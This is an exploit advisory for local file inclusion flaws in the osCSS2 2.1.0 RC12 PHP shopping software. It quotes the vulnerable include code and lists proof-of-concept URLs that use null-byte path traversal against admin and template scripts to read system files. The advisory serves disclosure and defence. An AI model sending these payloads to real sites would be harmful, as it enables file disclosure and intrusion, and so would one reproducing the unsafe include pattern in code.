===================================================================
    osCSS2 2.1.0 RC12 Multiple Local File Inclusion Vulnerabilities
===================================================================
    
Software:   osCSS2 2.1.0 RC12
Vendor:     http://www.oscss.org/
Vuln Type:  Local File Inclusion
Download link:  http://sourceforge.net/projects/oscss/files%2Foscss-2%2FosCSS 2.1. Final%2FosCSS2_2.1.0_preRC12.zip/download
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
 
Gratz: wellcome back YOGYACARDERLINK.web.id !!!
    
References: http://eidelweiss-advisories.blogspot.com/2011/03/oscss2-210-rc12-multiple-local-file.html
    
    
===================================================================
  
    description:
osCSS is a php ecommerce shopping program. Built on a foundation of oscommerce GPL code .
This version bring the script to web standard using XHTML 1.1 strict for markup language and CSS for layout presentation.
----------------------------------
    Vulnerability Details:
  
Some Vulnerability has been discovered by John Leitch (AutoSec Tools) that can be exploited via browser (xss & LFI) :

http://www.exploit-db.com/exploits/17069/

http://localhost/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
 
http://localhost/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00


-----------------------------------

Here is another vulnerability code i found there:

[!] admin/includes/template/oscss/gabarit-view.php
[!] admin/includes/template/defaut/gabarit-view.php


*/

$css=($_GET['forceview']=='print')? 'print' : 'view' ;
$CHARSET=(isset($_GET['forcecharset']))?$_GET['forcecharset'] : CHARSET ;
@include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
require(DIR_WS_TEMPLATE.'inc/lib.template.php');
?>

-----------------------------------

[!] admin/includes/template/oscss/gabarit-2.php

*/
    @include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
    require(DIR_WS_TEMPLATE.'inc/lib.template.php');
    if (($init_theme=tep_test_gab_ele('inc/init_theme')) !=false) require($init_theme);
?>

-----------------------------------
  
    exploit & p0c
    
[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
    or
[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-2.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
    or
[!] http://host/path_to_oscss/admin/includes/template/defaut/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
    
====================================================================
    
    Nothing Impossible In This World Even Nobody`s Perfect
    
===================================================================
    
==========================| -=[ E0F ]=- |==========================